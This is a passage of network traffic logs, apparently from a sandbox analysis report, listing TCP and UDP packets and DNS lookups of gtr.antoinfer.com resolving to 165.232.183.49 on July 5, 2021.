Jul 5, 2021 16:53:18.826138973 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:18.826142073 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:18.826174021 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:18.826183081 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:18.826200962 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:18.826205015 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:18.826231003 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:18.826231956 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:18.826257944 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:18.826392889 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:18.962951899 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:18.962991953 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:18.963016987 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:18.963037968 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:18.963059902 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:18.963082075 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:18.963108063 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:18.963148117 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:18.963171959 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:18.963193893 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:18.963268995 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:18.963300943 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:18.964179039 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:18.964210033 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:18.964232922 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:18.964256048 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:18.964272976 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:18.964278936 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:18.964279890 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:18.964302063 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:18.964364052 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:18.964370012 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:18.981645107 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:18.987241030 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.135222912 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.135248899 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.135263920 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.135281086 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.135296106 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.135314941 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.135332108 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.135348082 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.135364056 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.135380983 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.135390043 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.135412931 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.135628939 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.136276007 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.136293888 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.136312008 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.136327982 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.136348009 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.136420965 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.136428118 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.153024912 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.153620958 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.177371025 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.177397013 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.177640915 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.307109118 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.307158947 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.307174921 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.307192087 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.307212114 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.307221889 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.307229042 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.307235003 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.307245016 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.307264090 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.307276964 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.307280064 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.307296038 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.307324886 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.307329893 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.307470083 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.307979107 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.308000088 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.308020115 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.308024883 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.308038950 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.308047056 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.308054924 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.308096886 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.308104038 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.308274031 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.323549032 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.323630095 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.349381924 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.349400997 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.349420071 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.349458933 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.349538088 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.365891933 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.365951061 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.479355097 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.479379892 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.479394913 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.479414940 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.479434013 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.479449034 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.479448080 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.479465961 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.479481936 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.479497910 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.479513884 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.479516983 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.479520082 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.479566097 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.479568958 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.480014086 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.480043888 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.480062962 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.480078936 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.480092049 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.480094910 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.480098963 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.480164051 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.480364084 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.496184111 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.496268988 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.521446943 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.521466970 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.521481991 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.521497965 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.521548986 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.521564007 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.537856102 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.538058043 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.651458979 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.651489019 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.651513100 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.651535988 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.651557922 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.651582003 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.651582956 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.651606083 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.651634932 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.651660919 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.651696920 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.651704073 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.651706934 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.651710033 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.651778936 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.652051926 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.652092934 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.652127028 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.652170897 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.652183056 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.652192116 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.652206898 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.652240992 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.652245998 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.652271032 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.667783022 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.669019938 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.674742937 CEST	49732	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.693432093 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.693684101 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.693810940 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.693842888 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.693869114 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.693893909 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.693902016 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.693909883 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.693917036 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.693944931 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.693948984 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.693990946 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.709827900 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.712810993 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.823540926 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.823576927 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.823647022 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.823681116 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.824856997 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.824884892 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.824908018 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.824930906 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.824953079 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.824963093 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.824976921 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.824976921 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.825000048 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.825026989 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.825030088 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.825033903 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.825050116 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.825072050 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.825089931 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.825093985 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.825094938 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.825118065 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.825158119 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.825161934 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.830694914 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.840059996 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.840163946 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.865456104 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.865483999 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.865505934 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.865526915 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.865547895 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.865565062 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.865569115 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.865585089 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.865591049 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.865606070 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.865803003 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:19.882553101 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:19.882782936 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:20.014029026 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:20.014050961 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:20.014066935 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:20.014081955 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:20.014094114 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:20.014107943 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:20.014122963 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:20.014134884 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:20.014149904 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:20.014163017 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:20.014173985 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:20.014184952 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:20.014236927 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:20.014255047 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:20.014256954 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:20.015434027 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:20.016295910 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:20.037583113 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:20.037630081 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:20.037669897 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:20.037704945 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:20.037707090 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:20.037722111 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:20.037724972 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:20.037756920 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:20.037806988 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:20.037806988 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:20.037810087 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:20.037847042 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:20.037874937 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:20.037894964 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:20.037935972 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:20.037935972 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:20.037977934 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:20.038043976 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:20.055902958 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:20.055998087 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:20.167711020 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:20.167752981 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:20.167783022 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:20.167819977 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:20.167824030 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:20.167840958 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:20.167843103 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:20.167850018 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:20.167876005 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:20.167880058 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:20.167908907 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:20.167942047 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:20.167947054 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:20.167952061 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:20.168015957 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:20.168019056 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:20.170093060 CEST	49734	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:20.359426022 CEST	80	49734	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:21.110280991 CEST	49735	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:21.507550955 CEST	49737	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:21.507601976 CEST	49736	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:21.708146095 CEST	80	49736	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:21.708403111 CEST	49736	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:21.708478928 CEST	49736	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:21.709001064 CEST	80	49737	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:21.709254980 CEST	49737	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:21.951139927 CEST	80	49736	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:22.659883976 CEST	80	49736	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:22.659929991 CEST	80	49736	165.232.183.49	192.168.2.3
Jul 5, 2021 16:53:22.660034895 CEST	49736	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:22.660053015 CEST	49736	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:22.675050020 CEST	49736	80	192.168.2.3	165.232.183.49
Jul 5, 2021 16:53:22.875597954 CEST	80	49736	165.232.183.49	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 5, 2021 16:51:48.367106915 CEST	64185	53	192.168.2.3	8.8.8.8
Jul 5, 2021 16:51:48.421518087 CEST	53	64185	8.8.8.8	192.168.2.3
Jul 5, 2021 16:51:57.685502052 CEST	65110	53	192.168.2.3	8.8.8.8
Jul 5, 2021 16:51:57.746710062 CEST	53	65110	8.8.8.8	192.168.2.3
Jul 5, 2021 16:52:10.821851969 CEST	58361	53	192.168.2.3	8.8.8.8
Jul 5, 2021 16:52:10.885199070 CEST	53	58361	8.8.8.8	192.168.2.3
Jul 5, 2021 16:52:11.435316086 CEST	63492	53	192.168.2.3	8.8.8.8
Jul 5, 2021 16:52:11.502516031 CEST	53	63492	8.8.8.8	192.168.2.3
Jul 5, 2021 16:52:52.494676113 CEST	60831	53	192.168.2.3	8.8.8.8
Jul 5, 2021 16:52:52.561688900 CEST	53	60831	8.8.8.8	192.168.2.3
Jul 5, 2021 16:53:06.716258049 CEST	60100	53	192.168.2.3	8.8.8.8
Jul 5, 2021 16:53:06.775631905 CEST	53	60100	8.8.8.8	192.168.2.3
Jul 5, 2021 16:53:08.535655022 CEST	53195	53	192.168.2.3	8.8.8.8
Jul 5, 2021 16:53:08.589963913 CEST	53	53195	8.8.8.8	192.168.2.3
Jul 5, 2021 16:53:09.912365913 CEST	50141	53	192.168.2.3	8.8.8.8
Jul 5, 2021 16:53:09.969793081 CEST	53	50141	8.8.8.8	192.168.2.3
Jul 5, 2021 16:53:12.396389008 CEST	53023	53	192.168.2.3	8.8.8.8
Jul 5, 2021 16:53:12.452733994 CEST	53	53023	8.8.8.8	192.168.2.3
Jul 5, 2021 16:53:13.274960995 CEST	49563	53	192.168.2.3	8.8.8.8
Jul 5, 2021 16:53:13.332395077 CEST	53	49563	8.8.8.8	192.168.2.3
Jul 5, 2021 16:53:17.103620052 CEST	51352	53	192.168.2.3	8.8.8.8
Jul 5, 2021 16:53:17.160681963 CEST	53	51352	8.8.8.8	192.168.2.3
Jul 5, 2021 16:53:17.287802935 CEST	59349	53	192.168.2.3	8.8.8.8
Jul 5, 2021 16:53:17.335887909 CEST	53	59349	8.8.8.8	192.168.2.3
Jul 5, 2021 16:53:21.436383009 CEST	57084	53	192.168.2.3	8.8.8.8
Jul 5, 2021 16:53:21.498718977 CEST	53	57084	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jul 5, 2021 16:53:08.535655022 CEST	192.168.2.3	8.8.8.8	0x6f30	Standard query (0)	gtr.antoinfer.com	A (IP address)	IN (0x0001)
Jul 5, 2021 16:53:09.912365913 CEST	192.168.2.3	8.8.8.8	0x7236	Standard query (0)	gtr.antoinfer.com	A (IP address)	IN (0x0001)
Jul 5, 2021 16:53:13.274960995 CEST	192.168.2.3	8.8.8.8	0xb70f	Standard query (0)	gtr.antoinfer.com	A (IP address)	IN (0x0001)
Jul 5, 2021 16:53:17.103620052 CEST	192.168.2.3	8.8.8.8	0x3765	Standard query (0)	gtr.antoinfer.com	A (IP address)	IN (0x0001)
Jul 5, 2021 16:53:17.287802935 CEST	192.168.2.3	8.8.8.8	0x509f	Standard query (0)	gtr.antoinfer.com	A (IP address)	IN (0x0001)
Jul 5, 2021 16:53:21.436383009 CEST	192.168.2.3	8.8.8.8	0x856d	Standard query (0)	gtr.antoinfer.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jul 5, 2021 16:52:10.885199070 CEST	8.8.8.8	192.168.2.3	0xd1d4	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.akadns.net		CNAME (Canonical name)	IN (0x0001)
Jul 5, 2021 16:53:08.589963913 CEST	8.8.8.8	192.168.2.3	0x6f30	No error (0)	gtr.antoinfer.com		165.232.183.49	A (IP address)	IN (0x0001)
Jul 5, 2021 16:53:09.969793081 CEST	8.8.8.8	192.168.2.3	0x7236	No error (0)	gtr.antoinfer.com		165.232.183.49	A (IP address)	IN (0x0001)
Jul 5, 2021 16:53:13.332395077 CEST	8.8.8.8	192.168.2.3	0xb70f	No error (0)	gtr.antoinfer.com		165.232.183.49	A (IP address)	IN (0x0001)
Jul 5, 2021 16:53:17.160681963 CEST	8.8.8.8	192.168.2.3	0x3765	No error (0)	gtr.antoinfer.com		165.232.183.49	A (IP address)	IN (0x0001)
Jul 5, 2021 16:53:17.335887909 CEST	8.8.8.8	192.168.2.3	0x509f	No error (0)	gtr.antoinfer.com		165.232.183.49	A (IP address)	IN (0x0001)
